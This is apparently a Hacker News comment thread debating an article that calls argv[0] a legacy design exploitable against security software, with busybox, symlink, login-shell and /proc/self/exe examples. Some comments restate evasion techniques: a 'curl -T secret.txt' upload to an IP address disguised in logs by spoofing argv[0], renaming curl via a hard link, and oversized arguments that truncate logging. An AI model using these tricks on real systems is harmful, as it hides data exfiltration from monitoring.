However, I am willing to consider the discussion about whether there could be merit to restricting the ability to write that value; I could imagine a system that populated it only from the actual file name and did not allow it to be written by the parent process or the child process at runtime. The obvious place this still falls apart is that an attacker could just
ln /bin/curl ./some\ other\ name
but there are sometimes security measures that we use even though they're less than 100% effective so it at least conceivable that this might be a trade off worth making.The real point are the security flaws in a calling program setting argv[0], because it really, really should be set by the operating system. (As a programmer, I shouldn't have to defend against these kinds of attacks. The OS should block it.)
The criticisms of valid programming practices, IMO, hurt the author's credibility and distract from the real point of the article.
argv[0] was designed to be part of the arguments to the program, and it succeeds perfectly at that task. The problem is that it has been abused by external tools as a way to identify the program just because there was no other alternative.
It has to be writable because the entire argv string (in program memory) is writable and declared as
int main(int argc, char **argv)
not int main(int argc, const char **argv)
and needs to preserve back-compat. Classic C code might be calling strtok on the arguments, so that block of memory needs to remain writable.argv[0] should be used by any logging message that purports to report the program name, because argv[0] should be a string the human recognizes as something they invoked. Taking it away would break usability.
This does, of course, imply that the program name is non-constant untrusted data. Which means we shouldn't be making security software that depends on knowing that name.
I don't think that's the gist of the article, but the throwaway suggestion of 'just make lots of copies, who cares about diskspace' is insufficient and thus distracts. It's.. a single line about solutions in an article that isn't _about_ solving problems, it's about highlighting a problem exists and that it's worth solving.
I read the article more as: There is __often__ no good reason to use argv[0], and it should be avoided if at all possible, and if it cannot be avoided, it would behoove the industry to work on ways to make sure in the future it can be avoidable.
For example, why in the blazes does windows taskman.exe list argv[0] in the GUI table view? That's just asking for trouble. Show the actual file path, and always an absolute one - that way you avoid confusion about which executable you're actually running, and it's just as readable if not more readable for every app _except_ those who care about argv[0], e.g. if you ran `/bin/dd` and it's actually busybox, in taskman you'd see `/bin/busybox` instead which'd be worse than seeing 'dd'. That is simple enough to solve (add an API call to update _your own process name_ or at least update your own process 'title' which interfaces like ps/taskman can use accordingly), but, now we're talking about coordinating between OS, glibc, busybox, and so on - lots of parties. I don't mind that the article doesn't delve that deep, as that wasn't the point of it. The point is simply to show the problems the kludge of 'we will show argv[0] instead of the executable name' causes.
This article feels more about explaining that in the distant past, a mistake was made with some history as to why that mistake was made and the deleterious practical effects that this mistake is causing or is likely to cause (most of them security related). It's not really about solving the problem; that presumably comes later and should be sketched out by those who are knowledgable on _that_ subject. That doesn't imply the author is ignorant or that the article is insufficiently defended. Just that it hasn't covered all aspects of what it's writing about.
This was kind of in the middle of your complaint about windows, but then you've got unixy busybox discussion.
On a unix filesystem, a file that's hard linked with multiple names has no single 'actual name'. All of the names are equally valid. You could show the filesystem and inode number, which should uniquely identify the file, but is pretty user unfriendly.
Coding bugs into your programs is not a problem it’s a bug. None of the weird arg[0] examples can happen on the shell (without escaping), only when using system calls.
The more I read the article the more I feel this is a reaction to a behavior the author did not expect and fancy them as smart therefore the last 20 years of use age of this feature are obviously wrong.
https://man.freebsd.org/cgi/man.cgi?query=setproctitle&aprop...
If so, then I disagree with the premise of the article, fundamentally. I don't see a problem. If someone is writing security software and doesn't already know about the mutability of argv[0], and doesn't know that (on Linux at least) /proc/$PID/exe is the only correct way to gt the binary backing a process... well, then they have no business writing security software.
There is no problem here. The author is making a big deal about nothing, either because they have a weird axe to grind, or because they're ignorant.
There are numerous reasons why this is not desirable, for example knowing whether an application was called from one symbolic link or a relative path dictates what that application's working directory is.
You could argue the mistake was done elsewhere so this feature could be abused.
We could call it setproctitle, or something. \s
$ echo '#!/path/to/busybox echo' > myecho
$ chmod +x myecho
$ ./myecho 123
./myecho 123
Right now this doesn't work properly, because "./myecho" (argv[0]) gets placed into argv[2] of the process. Otherwise, this technique IMHO is better than symlinks:- Each applet uses the same amount of disk space (0 blocks, i.e. the content fits into inode).
- Doesn't read or write to argv[0].
- You could finally rename the applets. This is not that useful if busybox is your only posix userspace implementation, but very useful if you want many implementations to live side-by-side. E.g. on macOS, I'd like to have readlink point to BSD/macOS's readlink, greadlink to GNU coreutil's, bbreadlink to busybox's.
But as I said, this doesn't work for now. The best you can do now is to write shell two-liners https://news.ycombinator.com/item?id=41436012. Some of such two-liners may also fit into the inode inlining limit, so that's a plus. But you will have performance penalty on every call (since sh needs to start up).
Is that really the case? AFAIK, OpenWRT uses SquashFS by default, and a quick web search tells me that "[...] In addition, inode and directory data are highly compacted, and packed on byte boundaries. Each compressed inode is on average 8 bytes in length [...]" (https://www.kernel.org/doc/html/latest/filesystems/squashfs....). That is, even if the content fits into the inode, it will make the inode use more space (they're variable-size, unlike on traditional filesystems with fixed-size inodes).
And using hardlinks (traditionally, we use hardlinks with busybox, not symlinks) goes even further: all commands use a single inode, the only extra space needed is for the directory entry (which you need anyway).
Finally, symlinks can be relative, while the solution you proposed is not. This is particularly useful for distributing software, e.g. distributing a tar file with the busybox itself and their symlinks.
In fact, you don't even need symlinks at all: you can even have hard links, that could even save disk space on embedded filesystems, that are readonly images anyway.
#!/bin/sh
busybox $0 $@
and then every command required could just be a hardlink to the same script, instead of replicating it over and over again for hardcoded command names.Then I realised the whole point is to posit a world where $0 doesn't exist, and we're not allowed to be clever about it.
If there really is a need for having one executable that comprises multiple commands, is `busybox whoami` instead of `whoami` so much more effort? To me, that would make more sense in terms of what is going on; aliases could be used if one-word commands are preferred. In most non busybox contexts, argv[0] is just an unnecessary addition that, as the linked article shows, can introduce weirdness.
It's clear from the comments there are still many who think argv[0] is a good thing, which is great - I'm glad the post sparked this debate.
It's not the "more effort" that is the deal breaker here. It is a matter of compliance with specs and user expectations. What you're suggesting would make Busybox very non-POSIXy, very non-Unixy. All scripts written over the last many decades would need to be updated to call `busybox ls` instead of `ls`? How is that a viable solution?
> I'm glad the post sparked this debate.
This is a very strange way to deflect concerns about quality of the article!
Shell aliases don't solve all problems, even if you do:
alias rm="busybox rm"
alias xargs="busybox xargs"
# etc.
you still have to write `xargs -exec busybox rm`, because xargs won't use the shell alias.But the main problem with this approach is that POSIX and LSB require certain binaries to be available at certain paths. When they're not, most shell scripts will just break.
The minimal standard solution is probably to create shell scripts for all of these, e.g. in /bin/ls:
#!/bin/sh
exec /bin/busybox ls
But this both adds runtime overhead (on every invocation!) and is quite wasteful in terms of disk space. Busybox boasts over 400 tools. At 4 KB per file, that's 1.6 MiB of just shell scripts. Of course that can be less if the file system uses some type of compression which is common on embedded systems where storage space is small, but it still seems to defeat the purpose of using busybox to create a minimal system.I really don’t think it is a debate. The usage of arg[0] is massively understated by the article. Just go look at gcc or any modern day compiler. Its use so much that the conversion of should we has been hashes out by many different groups yet they still chose to implement it.
The security concerns are a non issue. As arg[0] was not the problem. It was the lack of technical knowledge of how systems work and a flaw in the security application.
Bash has an sh compatibility mode that runs when you invoke it as sh.
What you do? Replace every single occurrence of each command by prefixing it `busybox`? Not ideal at all...
You appear not to realize that busybox is an essential component of a POSIX like system.
Not that it couldn't be fixed by changing how we handle login shells but still. Worth remembering.
Similarly the busybox situation could be solved by having busybox ship posix shell wrapper scripts which use `#!/bin/busybox sh` as the shebang and simply consist of a line like `exec /bin/busybox ls "$@"`.
- symlink
- hardlink
- shell script wrappers
- executable binary wrappers around libbusyboxedit: basically login(1) execes your shell with - prepended, so an example where POSIX expects this
I think any reason one will find are based on backwards compatibility.
One good use for it is to make a guess as to where your executable is installed. Yes, it would be nice if there were a more certain way to get that... but not for security purposes. You don't want to rely on filenames for security anyway, because anybody can make copies and symlinks and rename files at will, and it's really, really hard to catch all the cases of that. Much harder than, for instance, remembering that argv[0] is a hint from your caller, not gospel from the OS.
In the same way, I know that it's fashionable nowadays for incompetent idiots to write security tools, but a security tool that trusts an argv value for anything much was obviously written by an incompetent idiot, because that's not what they're for.
Android does this for most common shell commands. Toybox and busybox are examples of such implementations.
I don’t see why not. It’s allowed to behave differently based on the arguments that follow it. I personally think the genericity of including the program name itself as one of its own calling arguments is really meta cool.
It's also certainly better from a readability standpoint to have `Remove-Item` rather than `rm` in a script.
Likewise, I would much rather type `ls -Al` rather than `ls --almost-all --long-listing` (N.B. --long-listing is not the long option for -l, -l has no long option, I just made up an appropriate name) when listing a directory but would probably appreciate the long form in a script.
I think just like we have long options and short options, it would be helpful to have long commands and short commands.
After all, its 50% faster to type a two letter acronym, than a TLA.
https://media.wired.com/photos/59327efdf682204f73696446/mast...
/e
A program should be sandboxed from its environment, including how the user started it. How a user names and organizes his files is a matter between the user and the operating system, not something individual program should care about.
Repeating the OP, your program takes every other parameter from the caller, why do you insist on the executable name to not be set by him too?
Windows defender is the one that is stupid by using it. Every OS has the real executable name in some place, security software should look there instead.
- Decompressing and inflating a compressed binary block with a generic decompressor at the top (e.g. a bash or python script with a binary blob at the end)
- Checksumming its own executable (skipping the checksum string) to resist virus infection. Not bulletproof but viruses aren't usually smart enough to circumvent this
The busybox argument or shutdown/reboot explains why the name of a symlinked binary is helpful as argv[0]. But does the busybox/shutdown case explain why the execv lets the user set the argv[0] value to anything other than what the path says?
That's missing the point, I think.
The real question here is, is the name of a program really an argument to the program, from the user's perspective? I certainly don't blame users that disagree. It's more difficult for them to change argv[0], and the fact that this is possible is not necessarily obvious to them, nor to their users.
If it helps, think of it like this: imagine the file timestamp was similarly passed as argv[-1]. And that the file inode number was passed as argv[-2]. Would it make sense to change behavior on those too?
When I use busybox [invisibly to me], I sure care that it knows whether I called it as "ls" or as "rm" and that it does the operation that I asked it to do.
For the former, I don't see how this goes against modern principles - in presence of symlinks, it is pretty reasonable to want to know both "how was this program called", as well as "what's the actual executable we ended up with". And this does more than just giving multiple names to same program - for example python uses argv[0] to tell if it's inside virtualenv and adjust search paths accordingly. This makes it appear like there are multiple python installs on system, with no extra disk space taken.
For the latter, yes, programs can have bugs and OSes can have non-obvious semantics, and if you are security software, it's very important to be aware about them. I would not mark "argv[0]" as something especially bad from security perspective. All the author's examples would still be possible in hypothetical world where argv[0] is set by system - as nothing stops user from creating a symlink in temporary dir with deceiving name (spaces and quotes are OK in filenames!) and exec'ing it directly. Instead, fix your security software so it quotes argv values?
And the key witness is systemd, which is too young to buy a beer - even in Germany.
Most people use argv[0] so they can do something like:
$ mycommand help
Type `mycommand foo bar` to foo bars.
$ mycommand1.2.3 help
Type `mycommand1.2.3 foo bar` to foo bars.
This is admittedly less fun when mycommand is /home/jrockway/.cache/bazel/_bazel_jrockway/7f95bd5e6dcc2e75a861133ddc7aee82/execroot/_main/bazel-out/k8-fastbuild/mycommand/mycommand_/mycommand` however.I seem to recall there was a language that only provided the stripped part - but I guess my memory is failing me here. Sorry for the wrong information above.
Try running `ls -li /usr/bin` on macOS and you might be surprised to learn that all of these are a single executable: DeRez, GetFileInfo, Rez, SetFile, SplitForks, ar, as, asa, ... yacc. There's 77 different entries in `/usr/bin` (including `git` and `python3`) that are all links to the same binary (`com.apple.dt.xcode_select.tool-shim`). It's a wrapper that implements the `xcode-select` concept to locate and run the real executable provided by either the Command Line Tools package or a particular Xcode version you may have installed.
And that's not the only one. There's another 68 links starting with `binhex.pl` and ending with `zipdetails` that are a single 811 byte wrapper-script around perl.
Altogether, I see that there are 26 different names that are multiply linked:
ls -li /usr/bin |
awk '{print $1}' |
sort | uniq -c |
sort -n | grep -v "\s*1\s" | wc -l
Some of the other examples: less & more, bc & dc, atrm & batch, stat & readlink.Having a program behave dynamically based on argv[0] is a useful tool in the Unix toolbox. The alternative would be compiling 77 different versions of `tool-shim,` creating 68 different versions of that perl wrapper, etc.
The `git` binary uses this concept too. You can create an executable named `git-foo`, put it anywhere in your PATH, and then call it as `git foo`.
In the end, argv[0] is just an argument that can be used to improve CLI ergonomics and reduce code duplication. It's not solely about disk space. I think that makes it a more common and useful concept than you give it credit for.
As to the rest of the post: I'm not really sure how argv[0] being in the caller's control is any different than the rest of the execution context being in the caller's control: the remaining arguments, the environment, limits on file descriptors, which file descriptors are open, the program's real and effective uid and gid, signals it might receive and so on. These all amount to untrusted input any executable has to be cognizant of, more or less so depending upon what privileges the executable has and what its goals are.
As a result, the author has such strange, absolute positions, calling it a legacy that should be abolished (only tangentially knowing some actual use cases), or that strange quote about design principles.
Despite all the talk about security, the whole debacle that argc can be 0 (and argv[0] can be NULL), is completely left aside. This has caused actual security issues quite recently[1].
Unfortunately, the author shot their credibility in the foot by perseverating on use of argv[0]; instead of glossing over it and getting to the point.
"legacy" -> anything that has existed for more than a day that I don't understand and don't like that stops me from poorly reinventing the wheel
"modern" -> anything that I dreamt up or heard some other hipster talk about recently that I got hyped about
1) Oh no, the only protection is looking at argv[0]. What kind of clown software is that? Software that notably runs on an already compromised system..
2) No need for argv[0] to fool software that concats argv values with spaces: just run 'curl -o "test.txt |grep" 1.1.1.1'
3) A long argument messes up telemetry? Let's hope that bucket doesn't have more holes.
Isn't this contradicted by the docs? CreateProcess receives lpApplicationName and lpCommandLine, and they can be different.
> If both lpApplicationName and lpCommandLine are non-NULL, the null-terminated string pointed to by lpApplicationName specifies the module to execute, and the null-terminated string pointed to by lpCommandLine specifies the command line. The new process can use GetCommandLine to retrieve the entire command line. Console processes written in C can use the argc and argv arguments to parse the command line. _Because argv[0] is the module name, C programmers generally repeat the module name as the first token in the command line._
int execv(const char *path, char *const argv[]);
The argument path points to a pathname that identifies the new process image file.
The argument argv is an array of character pointers to null-terminated strings. [..] The value in argv[0] should point to a filename string that is associated with the process being started by one of the exec functions.
Windows does not allow you to do that, AFAIK.
[1]: https://pubs.opengroup.org/onlinepubs/9699919799/functions/e...
It does though, using the lpCommandLine parameter to CreateProcess as I said.
CreateProcess("main.exe", "foobar", ...)
argv[0] is "foobar"
No it doesn't make software less predictable nor does it goes against modern design principles. argv has very handy use cases and can be used to provide better user experience.
Unless you have evidence to back up your claims, you're just turning a subjective opinion to an objective one without any merit.
Either way, it's software developer choice and irrelevant to the user as much as it is irrelevant to the user whether the developer prefers for(;;) over while(1).
On desktop machines, perhaps, but this is certainly not true on all platforms Linux runs on.
Tell me why a simple calculator app needs more memory than a complete multi-server implementation of the IRC protocol (including SSL/TLS), not to mention a full scripting engine.
But of course this much more of an issue for embedded platforms like routers with OpenWRT.
The author's just dumb.
Busybox says hello.
Seriously though, how is this on the front page? Both the premise and conclusions contradict the reality of how argv[0] is used with symbolic links and hard links.
extern char *__progname;
which holds the program name without the (optional) invocation path in front of it. Basically the last path component of argv[0].And neither the want-it nor the don't-want-it case is such an outlier that you can disregard and not serve that case.
Sometimes you're talking to the user about general usage and the full path is a distracting detail and not the important part of the message.
Sometimes the full path and truthful invoked filename are an unnecessary security disclosure like telling a web viewer details about the server.
Sometimes the full path and truthful invoked filename is a necessary fact in debugging, or in errors, or even ordinary non-error logs that aren't public.
Says who? I'm not aware of any modern design principles that say anything about this sort of thing.
> argv[0] is ignored (mostly)
Pretty much any program I've written that has a --help option uses argv[0] to print out the usage string, i.e.:
printf("%s [--some-arg] FILENAME\n", argv[0]);
> First off, argv[0] can be used to fool security softwareThen that security software is poorly written. On Linux, the correct way to find the binary of a running process is by calling readlink(2) on /proc/$PID/exe. Assuming security software like this is going to have a lot of OS-specific code, it seems fine to me to expect they use it (and then have to do other things on other OSes).
> Another argument against this design is that if you have two programs that are so similar that it pays off to consolidate them into a single file, is there really a need for two separate programs/program names?
The author is talking about shutdown and restart being symlinks to systemctl on systemd-based systems. But what about something like busybox? busybox contains hundreds of programs, all conveniently in a single, statically-linked binary. On my system it's about 800kB. While I agree that even 250MB is not a big deal for most systems these days, it certainly is a problem for, say, a WiFi router that only has 8MB of flash.
> Ultimately, nobody wants to be bothered by argv[0].
False. I find it useful, and am not "bothered" by it at all. And I suspect security folks aren't really bothered either: the ones that actually know what they're doing look at /proc/$PID/exe when they want to find the binary backing a PID.
This article is kinda lame, and it seems like the author's objections are mostly based on ignorance.
This is not an argument at all, this is a statement that arguments exist. What are they?
It's like saying we shouldn't do something because it's "against best practices". I'm asking why are other practices preferred...
It's probably a good idea to not have it settable to other values by the invoking process, as is generally the case on Windows (ignoring its Posix subsystem here).
Well there is an use case that I sometime use for setting argv[0]. Consider you want to run yourself as a subprocess. Why you want to do that? There are plenty of reasons, but in general the thing is that doing things after a fork() is not safe under some circumstances and thus sometimes you also want to exec yourself.
A technique is to then call yourself using another name in argv[0] for then in the main take a different flow from the normal command line parting, without adding an argument that the user can specify if it know that it exists.
Yes, I know that there are a ton of other methods to do the same thing (perhaps an environment variable, for example), but I find the method of argv[0] quite nice and simple to be fair.
# Inside your container:
$ flatpak --version
zsh: command not found: flatpak
# Have host-spawn handle any flatpak command
$ ln -s /usr/local/bin/host-spawn /usr/local/bin/flatpak
# Now flatpak will always be executed on the host
$ flatpak --version
Flatpak 1.12.7
I am able to tell the symlink name by reading argv[0] to know which command to run. It is such a powerful and neat UNIX trick that has no simple alternative (in this example one would have to write ad-hoc shell scripts for each command they want to run)Solution: we should not use argv[0]?
While argv[0] is old, if you had to design it from scratch to day, it would still be a good idea to have the program invocation name as an argument.
The idea that anything old must is historic quirk that we can today eliminate is flawed.
Now argv[0] should not be relied upon for obtaining the executable name, except as a last resort if the program is built for platforms that don't have anything else. But if one executable has multiple program names via symlinks, only argv[0] will distinguish them.
It's ridiculously useful aside from the obvious busybox style usage.
It's huge to be able to have a pointer to the directory where the executable resides, so you can package other assets along side it and have it all work for free without a seperate configuration file or env variables etc.
Or for debugging or even non-error logging. You might call a binary from more than one place by other means than symlinks or hard links. You might be running from different mounted filsystems, chroot or container environments etc. A symlink might be in the middle of the path and not the executable name itself. Similarly a mount point.
It's just a random small useful tool like all others. Calling it some kind of security problem is like saying that screwdrivers are a security problem because aside from turning screws, some people can use screwdrivers to stab people, and we have nut drivers which can almost serve almost all the same needs for only a little extra work.
If your context of the moment means you have a security concern where you shouldn't trust this bit of data as gospel for some reason, then don't. Treat it like user input and take whatever precautions and fallback measures and sanity checks make sense for you in whatever particular situation you are in.
F-ing dumb.
Yes! I was surprised how far down I had to scroll to find somebody mentioning that one.
How else can you write a reasonably robust script that actually, you know, does something? You almost always need to grab some known files by their paths relative to the script.
Some languages don't provide a better solution but they should. For Bash there is ${BASH_SOURCE[0]}. For compiled executables you use OS-provided functions like GetModuleFileName(NULL, ...) on Windows and readlink("/proc/self/exe", ...) on Linux.
A good language spec is laid out in a way that reads from front to back with minimized circularity. See Common Lisp, Java, Python, etc.
As a kid in high school checking out Unix manuals and implementing many Unix tools in
https://subethasoftware.com/2022/09/27/exploring-1984-os-9-o...
I struggled with K&R because of the circularity of the book, which was really an anomaly built into C, the culture of C, or both because C++ books still read this way. C had so many half-baked things, such as an otherwise clean parser that required access to the symbol table. And of course a general fast and looseness which lead to the buffer overflow problem.
There were other languages which failed to solve the systems programming problem like PL/I and Ada, not to mention ISO Pascal which could have tried but didn’t. (Turbo Pascal proved it could have been done.)
People took until 1990 or so to be able to write good language specs consistently, so we can forgive Unix but boy is it awful if you look closely at it. On the other hand, IBM never did make a universal OS for the “universal” 360, yet Unix proved to be adaptable for almost everything.
and as for IBM i managed to use all sorts of OSs in VMs on IBM hardware back in the 1980s. Which did you have problems with?
typdef int myint;
myint x;
which is unusual among programming languages. Sure I used VM on IBM hardware in the 1980s and it was great. I also used timesharing systems on the PDP-8 (what atrocious hardware!), the PDP-11 and the PDP-10/20 in the 1970s. Although the 360 was superior in so many respects (except for the slow interrupt handling) it failed to break into the huge market for general-purpose timesharing to support software development and such (learning BASIC) until the time microcomputers came along and crushed the timesharing market. (PDP-10 was famously used to develop microcomputer software such as the original Microsoft BASIC and Infocom's z-machine games)Fred Brooks' project to develop an OS for the 360 was notoriously troubled and IBM belatedly turned to VM as a dark horse. Today it looks ahead of its time (as virtualization became mainstream on x86 in the 00's) but back then IBM was flailing and they wound up with a good software story by accident. It was not really their fault, people just didn't know how to make an OS and the most advanced thinking back then was monstrosities like MULTICS. It was Unix and VAX/VMS that pointed to what a general purpose OS would look like a few years later and there has been relatively little innovation since then because nobody can afford to rearchitect the user space. (e.g. no way you can take out the "bloat" because you'll have to put it back in to run the software you want)
IBM's z-architecture (the other z) has a great software story today (even runs Linux) but it was not the Plan A or even the Plan B.
Seems like this security software is broken, not argv[0]
I'm fascinated by the intersection of argv[0], and the execve behavior of replacing the calling program with the called one.
Aside from that, I quite like argv[0], for a much more limited set of reasons than considered in this interesting and comprehensive article. I like the ability to "retitle" a process to put a useful, descriptive, or branded name in there to be seen by ps, et al.
NodeJS also exposes this feature, but not quite as you might expect. Whereas in C, setting argv[0] from within the program's execution context will alter what is observed by ps, in NodeJS process.argv is just a descriptive getter. Setting its slots has no effect outside of its context.
But this is where process.title steps in. Setting process.title allows you to (in an OS-dependent way) change the name reported in ps and similar tools.
Read more here: https://nodejs.org/api/process.html#processtitle
Please don't kill argv[0], its lease hath all too short a date
https://linux.die.net/man/3/execve
If you already know about the additional man pages beyond user space, i cannot more strongly recommend diving into them. Additionally the gnu 'info coreutils' is a good place to start, as well as the glibc manual.
This is still very much an issue. For the shutdown and reboot case, the main reason those symlinks is exist is for backwards compatibility for existing programs and scripts (and muscle memory) that assume there is a shutdown or reboot command, and compatibility with systems that don't use systemd.
Another way to do that could be to use a shell script that execs systemctl, but that requires a separate intermediate shell process, which may have its own compatibility issues.
Another use of argv[0] that isn't discussed at all is putting a hyphen at the beginning of argv[0] for login shells. For example if bash is invoked as the login shell argv[0] is "-bash". That probably wasn't a great design decision, but changing it now would probably cause a lot of breakage.
For most other things, definitely unnecessary.
Is it only speaking against `argv[0]` or `argv` in general?
What is this proposed solution if any?
What about `__progname`? The only issue here is that if `argv[0]` is a path, then `__progname` is only the filename. What if I want the path?
Summary: By manipulating argv[0], a malicious program can hide what its doing in security logs. For example, a malicious program can make "curl -T secret.txt 123.45.67.89" look like "curl localhost | grep -T secret.txt 123.45.67.89" in security logs. A mallicious program can also use very large argv[0] values as a DOS attack on system logging; or to truncate malicious arguments.
IMO, operating systems should block this practice.
Unfortunately, the author's extensive criticism of programs reading argv[0] hurt the author's credibility before most people get to the real point of the article.
The "look like" is not a problem with the OS but a problem with displaying an array as a space-separated string without sufficient quoting or escaping, making things ambiguous.
Not only is there a Wikipedia article on it, there's more than one.
Here's the one covering science and engineering, which is the appropriate version for this discussion.
https://en.wikipedia.org/wiki/Intrinsic_and_extrinsic_proper...
Also claiming that the windows API to call a new process is good… wow… I guess he's never had to pass a filename with quotes and spaces in its name. The API expects you to do the escaping yourself. Yes it needs to be escaped, because it's all one single string.
A side effect of that is that programs do their own unescaping. Unix users who are used to quotes being stripped for them may be surprised by this.
One can then guess what the PYTHONPATH and LD_LIBRARY_PATH should be most of the time and save someone from having to set them.
Obviously this is of most use when you're running something you've installed into /opt (e.g. /opt/myprog/bin, /opt/myprog/lib etc) or are running it from the source tree.
Not in general it doesn't. Convention for shells is to pass the string the user used to invoke the program which may be an absolute path, a relative path or just a filename resolved against $PATH.
> this enables all sorts of binaries that work out where their dependencies are relative to their original binary
You should use the OS-specific functions to retrieve the current executable path for that - GetModuleFileName(NULL, ...) on Windows and readlink("/proc/self/exe", ...) on Linux. For script look into your interpreter documentation - e.g. Bash has ${BASH_SOURCE[0]}. Unfortunately POSIX shell scripts are SOL and have to rely on $0 plus some $PATH searching.
If we want something to be used in security field, the design since day 0 should consider it. Trying to retrofit something will break a lot of things.
Nope.
> Should a program be allowed to behave differently based on its name?
Yes. The program can also inspect any other part of its environment, including the parent process. What makes sense to inspect here depends on the particular program in question. The symlink example is still useful today.
> From a 2020s standpoint, this seems highly undesirable
Nope.
> it makes software less predictable
It doesn't. It makes it more predictable if programs can easily provide compatibility interfaces. Yes, you could do the same with a wrapper but removing friction matters.
> and goes against modern design principles.
Then modern design priciples can take a hike.
> Today however, disk space is no longer considered an issue
It should be considered an issue though. I buy better hardware to get more use out of it, not for lazy developers to needlessly piss it all away.
This is just yet nother example of "securit" people trying to make their lifes easier by making other's lifes harder. And as usual it's only theater since almost all of the "exploits" apply to arguments as well which for many programs provide plenty opportunity to include arbitrary strings. Fix your tools instead of expecting the world to work around their limitations.
Tell me you don’t use Docker without telling me you don’t use Docker.
I’d argue the certutil problem the author mentions is a flaw in certutil, not argv’s fault. Doesn’t that mean it falls to symlinks as well?
If you look at sudo, it’s generally deny by default. Rename a program all you want, you won’t get to use it unless you can overwrite a program that is in the sudoer file. So I don’t know what nonsense certutil is playing at if it’s using argv to do its job. That’s appalling.
There is life outside the enterprise security theater.